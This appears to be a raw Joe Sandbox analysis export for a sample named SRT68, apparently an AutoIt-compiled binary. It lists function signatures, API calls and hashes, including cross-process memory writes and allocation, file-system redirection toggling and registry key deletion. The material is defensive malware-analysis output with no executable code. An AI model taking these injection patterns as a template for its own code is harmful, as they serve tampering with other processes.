                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorHandling__87except__start
                                                                      • String ID: pow
                                                                      • API String ID: 2905807303-2276729525
                                                                      • Opcode ID: 724fbf9af89edb304665ce0fc1747526685de383f4f78eacfc0484c9f3824baa
                                                                      • Instruction ID: 06b54c12e3c92cb5aa103d95bed9c4bde233c6e5073a48045ed5f005a08421a6
                                                                      • Opcode Fuzzy Hash: 724fbf9af89edb304665ce0fc1747526685de383f4f78eacfc0484c9f3824baa
                                                                      • Instruction Fuzzy Hash: A8518B71D0960386DB217624CE07B6E3B95AB40B20F28895EE4D5C6399DF399DC4BB82
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memset$_memmove
                                                                      • String ID: ERCP
                                                                      • API String ID: 2532777613-1384759551
                                                                      • Opcode ID: f6f4411607d113955e74c7c22b1e00fd4dcf52b3caeaa110d76729e821f0cf4d
                                                                      • Instruction ID: ef44bbb142230225388ddc156ec0046b40d864620693f5be7a3a8a48280d1dc2
                                                                      • Opcode Fuzzy Hash: f6f4411607d113955e74c7c22b1e00fd4dcf52b3caeaa110d76729e821f0cf4d
                                                                      • Instruction Fuzzy Hash: E8518171900309DBDB24DF55C941BEAB7E4EF44314F24456EE94AC7251EB38AA44EF50
                                                                      APIs
                                                                        • Part of subcall function 010014BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FF9296,?,?,00000034,00000800,?,00000034), ref: 010014E6
                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00FF983F
                                                                        • Part of subcall function 01001487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FF92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 010014B1
                                                                        • Part of subcall function 010013DE: GetWindowThreadProcessId.USER32(?,?), ref: 01001409
                                                                        • Part of subcall function 010013DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00FF925A,00000034,?,?,00001004,00000000,00000000), ref: 01001419
                                                                        • Part of subcall function 010013DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00FF925A,00000034,?,?,00001004,00000000,00000000), ref: 0100142F
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FF98AC
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FF98F9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                      • String ID: @
                                                                      • API String ID: 4150878124-2766056989
                                                                      • Opcode ID: 077dd7753ef405c330def0cf8a7cfad91a2fab9f47272ec323797bb042e95116
                                                                      • Instruction ID: e03f45c20a9a14169e61223093c9d8a3a2b49bfc1c679bde5464645b049767f8
                                                                      • Opcode Fuzzy Hash: 077dd7753ef405c330def0cf8a7cfad91a2fab9f47272ec323797bb042e95116
                                                                      • Instruction Fuzzy Hash: AF415175D0011DAFDB21DFA4CC85EDEBB78EF09340F104059EA95B7190DA71AE45DBA0
                                                                      APIs
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0102F910,00000000,?,?,?,?), ref: 010279DF
                                                                      • GetWindowLongW.USER32 ref: 010279FC
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01027A0C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID: SysTreeView32
                                                                      • API String ID: 847901565-1698111956
                                                                      • Opcode ID: 6bc9bed276708f0da4b652904ebf9cb2a89a5feda0a20b2dd2012acde7cba245
                                                                      • Instruction ID: 5854e28144877a7c73762753186045031b9f01cbc4f615cc7ac071c34f5191c7
                                                                      • Opcode Fuzzy Hash: 6bc9bed276708f0da4b652904ebf9cb2a89a5feda0a20b2dd2012acde7cba245
                                                                      • Instruction Fuzzy Hash: E431FE71200216ABEB618E38CC01BEB7BA9FB59334F204719F9B5A22E0D735E8508B50
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 01027461
                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 01027475
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 01027499
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window
                                                                      • String ID: SysMonthCal32
                                                                      • API String ID: 2326795674-1439706946
                                                                      • Opcode ID: 589c8323e2f402848bb38913f7c9ab2666a13af545bc3ff711b71b187d47476a
                                                                      • Instruction ID: 263666db36516daf477a0c3fe2b1d5260b4ebe678a9126329e832b65f63f10bb
                                                                      • Opcode Fuzzy Hash: 589c8323e2f402848bb38913f7c9ab2666a13af545bc3ff711b71b187d47476a
                                                                      • Instruction Fuzzy Hash: A421A332500229ABDF268E64CC45FEA3BB9FF48724F110154FE956B1D0DB75A851DBA0
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 01027C4A
                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 01027C58
                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01027C5F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$DestroyWindow
                                                                      • String ID: msctls_updown32
                                                                      • API String ID: 4014797782-2298589950
                                                                      • Opcode ID: e25211ee5b4a7e7cc27a9484e2e8d7bd12171fbbcce8be5a94be98fd84de4ec5
                                                                      • Instruction ID: d51fd40abb26563977aeea93914d013071f42468182f93707a77890499ce0bdf
                                                                      • Opcode Fuzzy Hash: e25211ee5b4a7e7cc27a9484e2e8d7bd12171fbbcce8be5a94be98fd84de4ec5
                                                                      • Instruction Fuzzy Hash: A82181B5600119AFEB21DF28DCC1DA737EDEF5A394B540059FA819B351CB36EC118BA0
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01026D3B
                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01026D4B
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01026D70
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$MoveWindow
                                                                      • String ID: Listbox
                                                                      • API String ID: 3315199576-2633736733
                                                                      • Opcode ID: ed7afdf0eafab88629d20c75a5e4bfbf4e24ff4fe92bcd55077bbbba540d121b
                                                                      • Instruction ID: eb9da11f1dc0f71398f338c068e8fcbf963351acfb768fa69867e60adb7eec0b
                                                                      • Opcode Fuzzy Hash: ed7afdf0eafab88629d20c75a5e4bfbf4e24ff4fe92bcd55077bbbba540d121b
                                                                      • Instruction Fuzzy Hash: 6521B332600128BFDF229F58DC44FBB3BBAEB89750F118128F9859B191C6729C5187A0
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 01027772
                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01027787
                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01027794
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: msctls_trackbar32
                                                                      • API String ID: 3850602802-1010561917
                                                                      • Opcode ID: ecd303c9c196038dd254d1349b8b22f1f478aeb85d86c20f464d935ff7dd4057
                                                                      • Instruction ID: adb2d854bb4a12a08a64d338643f7b4ad5454754d9c25135d086e10b2a838086
                                                                      • Opcode Fuzzy Hash: ecd303c9c196038dd254d1349b8b22f1f478aeb85d86c20f464d935ff7dd4057
                                                                      • Instruction Fuzzy Hash: FB11E372240219BAEF205E65CC05FEB7BA9FF89B54F114528FA85A6090C672E411CB20
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00FA4B83,?), ref: 00FA4C44
                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FA4C56
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 2574300362-1355242751
                                                                      • Opcode ID: 8861d8242ea9e5524d563994c356eafe70b119196f28dccbde1c22747eb7f6de
                                                                      • Instruction ID: cf4f60e89ee45b7e563f556ddde3797f991ecaa7305805c0be426c4fa5e1f080
                                                                      • Opcode Fuzzy Hash: 8861d8242ea9e5524d563994c356eafe70b119196f28dccbde1c22747eb7f6de
                                                                      • Instruction Fuzzy Hash: 5CD01270951713CFD7305F32D91860676E8AF067A1B61882DD4E9DA114E6B4E880C751
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,01021039), ref: 01020DF5
                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01020E07
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                      • API String ID: 2574300362-4033151799
                                                                      • Opcode ID: d3972bb9f285f078eedb48fbd72201c68d753126b7a2baeb9655aecc27d44efa
                                                                      • Instruction ID: 6c18c41cf9db0c9690ce582a131a295fc6820e6b546708ec08fddcc3e4251d27
                                                                      • Opcode Fuzzy Hash: d3972bb9f285f078eedb48fbd72201c68d753126b7a2baeb9655aecc27d44efa
                                                                      • Instruction Fuzzy Hash: A0D01270510723CFD7705F75C408647B6E5AF05696F618C6DE9C6D6104D6B9D4E0C750
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00FA4BD0,?,00FA4DEF,?,010652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FA4C11
                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FA4C23
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 2574300362-3689287502
                                                                      • Opcode ID: 30264a49fbe41aa5f3700fbf1e247280222662798702f040e93aa348b6096480
                                                                      • Instruction ID: 217c0d9e45c1a72ab11372653bd4df22dfc5fcdb5d751a492d4ffe7af58c6dae
                                                                      • Opcode Fuzzy Hash: 30264a49fbe41aa5f3700fbf1e247280222662798702f040e93aa348b6096480
                                                                      • Instruction Fuzzy Hash: 7BD01270911713CFD7306F71D918607B6E5EF0A6A1B618C2DD4CAD6210E6F4E880C750
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,01018CF4,?,0102F910), ref: 010190EE
                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 01019100
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                      • API String ID: 2574300362-199464113
                                                                      • Opcode ID: 037e388141abf5be54928bf3bec4c38f65b8df718a9db7cb917aa8d1227f8131
                                                                      • Instruction ID: d344fe2d0bb21b18cf41d7130511b99b58552d5bd1d6c624dae9a2a163a659f7
                                                                      • Opcode Fuzzy Hash: 037e388141abf5be54928bf3bec4c38f65b8df718a9db7cb917aa8d1227f8131
                                                                      • Instruction Fuzzy Hash: A2D01734510723CFDB309F36D82960776E5AF0A695B26C86EE9C6DA544E6B9C4C0CB90
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: LocalTime__swprintf
                                                                      • String ID: %.3d$WIN_XPe
                                                                      • API String ID: 2070861257-2409531811
                                                                      • Opcode ID: dcf3c337816b28508416f5c492ce092332a436e9c260133c2506022d89a7ef2b
                                                                      • Instruction ID: c1035e63a379a30d9dd3eea17c641b75235baaf833e4d02ec5c0cf4fa158fbe5
                                                                      • Opcode Fuzzy Hash: dcf3c337816b28508416f5c492ce092332a436e9c260133c2506022d89a7ef2b
                                                                      • Instruction Fuzzy Hash: BED01273805159EAC7149A939889EBD777CB709741F500456F80692140E2358798F621
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 636896c1529f5efce703f1a3b8f013f2e988054d24bb8dfca0398e96d5cec84a
                                                                      • Instruction ID: 24c29dba4e7b54534e2858e599ac92212c670d4343658d54d763bdc098a2e496
                                                                      • Opcode Fuzzy Hash: 636896c1529f5efce703f1a3b8f013f2e988054d24bb8dfca0398e96d5cec84a
                                                                      • Instruction Fuzzy Hash: A4C16C75A0421AEFCB14DF94C884EAEFBB5FF48710B148599E905EB261D730ED81EB90
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?), ref: 0101E0BE
                                                                      • CharLowerBuffW.USER32(?,?), ref: 0101E101
                                                                        • Part of subcall function 0101D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0101D7C5
                                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0101E301
                                                                      • _memmove.LIBCMT ref: 0101E314
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                                      • String ID:
                                                                      • API String ID: 3659485706-0
                                                                      • Opcode ID: 3f01d1b1cbb78d55a91afd71bc3292c978ea7fbfcbe0069d8a7c3a127c8dc404
                                                                      • Instruction ID: c76df6713682dbe8d128e495d3b2a9e63abeae79bffa33b9aaa9b4d340681a5b
                                                                      • Opcode Fuzzy Hash: 3f01d1b1cbb78d55a91afd71bc3292c978ea7fbfcbe0069d8a7c3a127c8dc404
                                                                      • Instruction Fuzzy Hash: 77C157716083018FC755DF28C880A6EBBE4FF89714F04896EF9999B351D739E946CB82
                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 010180C3
                                                                      • CoUninitialize.OLE32 ref: 010180CE
                                                                        • Part of subcall function 00FFD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FFD5D4
                                                                      • VariantInit.OLEAUT32(?), ref: 010180D9
                                                                      • VariantClear.OLEAUT32(?), ref: 010183AA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                      • String ID:
                                                                      • API String ID: 780911581-0
                                                                      • Opcode ID: 7b5e4a69c46e27b8e8de1d905f5d0cdf7c2d28b04468ca7ab37be8844c5b5241
                                                                      • Instruction ID: 636f1d1d8a74bc13468f014af4767e2d9206f75167215ca2bbd0e27857cf1261
                                                                      • Opcode Fuzzy Hash: 7b5e4a69c46e27b8e8de1d905f5d0cdf7c2d28b04468ca7ab37be8844c5b5241
                                                                      • Instruction Fuzzy Hash: 68A169752047019FDB50DF54C881B6AB7E4BF8A354F48845DFA969B3A1CB78EE04CB82
                                                                      APIs
                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,01032C7C,?), ref: 00FF76EA
                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,01032C7C,?), ref: 00FF7702
                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,0102FB80,000000FF,?,00000000,00000800,00000000,?,01032C7C,?), ref: 00FF7727
                                                                      • _memcmp.LIBCMT ref: 00FF7748
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                      • String ID:
                                                                      • API String ID: 314563124-0
                                                                      • Opcode ID: 1ae52d5e116c0ff9dec3657765858db47d7db4d704a7412ac742b33b4a26dcaf
